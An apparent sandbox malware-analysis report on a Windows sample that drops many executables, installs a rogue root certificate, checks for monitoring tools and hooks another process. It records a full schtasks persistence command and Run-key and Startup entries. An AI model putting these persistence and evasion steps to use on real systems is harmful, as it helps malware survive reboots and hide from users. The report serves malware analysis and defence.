Source: 0.2.gobEmOm5sr.exe.5790000.5.raw.unpack, Component1.cs High entropy of concatenated method names: 'Dispose', 'c2ZnNKXfM', 'KdItahZbaqrPOGXMMIH', 'F6Y0glZWI5sNge0KygR', 'oiohBeZubh6iBGSEkrx', 'eHnLj8Z41B6OG7M1JDy', 'N4gwHqZEFQ33Xh9XSL4', 'UsxTXAZipbL0y4O7ig6', 'lWEAf5ZlGZ9tBNchonB'
Source: 0.2.gobEmOm5sr.exe.5790000.5.raw.unpack, UserControl1.cs High entropy of concatenated method names: 'Dispose', 'F2igcbrUX', 'XHGgAUZzLmxCg9LHS8J', 'S8TWddN28E6t6e1W5DI', 'nxnywSZIvTRDeZkh3vn', 'Lg0nedZDohNDcCeYfhA', 'MCqqDaNZbmCaRq0a6S3', 'pte1vQNNcjSXyOcA1wm', 'FihZepNhpEadD2XS1mj', 'v4bBBrN14WWJwYVFB1v'
Source: 0.2.gobEmOm5sr.exe.5790000.5.raw.unpack, Hg0i8ysWBkmOQpOTDa.cs High entropy of concatenated method names: 'BBiryfpB2', 'KI0GlCWQr', 'nZK2JcQAs', 'lkTeKjlkc', 'RYq1Z9XkI', 'XOTf7va1f', 'Dispose', 'YAroKCCXX', 'acfjChBBkMo7PdIk7G', 'MFS1TWc0IT345kpNHi'
Source: 0.2.gobEmOm5sr.exe.5790000.5.raw.unpack, Ca01BQGh9DxiBOJwup.cs High entropy of concatenated method names: 'Qr5ud0NzY98AOC9xd95', 'G0Y0Wrh2oh1RhmJKSXb', 'X83AawNIkZucWFsrjDy', 'uZXqgXNDChJaWlp6NOY', 'ce4DmfsmSrOT856tDgfrkMb', 'qNiCQfbwXf', 'TgalQGhh96LsT9w8Qmj', 'Fw7QQNh18VntnfmGixE', 'ILFoXIhoc2Bm12rmWG4', 'AZNUskhyETNOaYTT1jk'

Persistence and Installation Behavior
barindex
Drops PE files to the document folder of the user
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Jump to dropped file
Installs new ROOT certificates
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lamp[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\NewStar\newstar.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\66d1b7f7f3765_Front[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\lnef[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\filename.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\Temp\is-QIRUR.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\NewStar\unins000.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\NewStar\libssl-1_1.dll (copy) Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe File created: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\NewStar\is-KRTJG.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66d98aa7bea3e_newPrime[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66d70e8640404_trics[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66c6fcb30b9dd_123p[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\NewStar\is-9IS1N.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\Temp\is-QIRUR.tmp\_isetup\_iscrypt.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\NewStar\libeay32.dll (copy) Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sgnr[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\66d897ad1752a_File[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\NewStar\is-2Q3FJ.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vjgg[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\NewStar\is-EAF0N.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\NewStar\ssleay32.dll (copy) Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vjgg[1].exe Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe File created: C:\ProgramData\jewkkwnf\jewkkwnf.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\userJJJJDAAECG.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66d59ef9d4404_premium[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\NewStar\newstar.exe File created: C:\ProgramData\DB Light Pack Engine 9.6.45\DB Light Pack Engine 9.6.45.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\install[1].exe Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe File created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe File created: C:\Users\user\AppData\Local\Temp\PowerExpertNNT\PowerExpertNNT.exe Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[2].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\userDGHCBAAEHC.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp File created: C:\Users\user\AppData\Local\Temp\is-QIRUR.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\66d9de22f231f_crypted[1].exe Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe File created: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\NewStar\newstar.exe File created: C:\ProgramData\DB Light Pack Engine 9.6.45\DB Light Pack Engine 9.6.45.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe File created: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe File created: C:\ProgramData\jewkkwnf\jewkkwnf.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Window searched: window name: Regmonclass
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk
Stores files to the Windows start menu directory
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6

Hooking and other Techniques for Hiding and Protection
barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe Memory written: PID: 8064 base: 7FFE22370008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe Memory written: PID: 8064 base: 7FFE2220D9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
